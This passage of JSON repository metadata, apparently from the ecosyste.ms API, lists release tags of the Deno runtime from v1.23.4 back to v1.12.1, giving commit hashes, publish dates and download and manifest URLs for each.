0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z",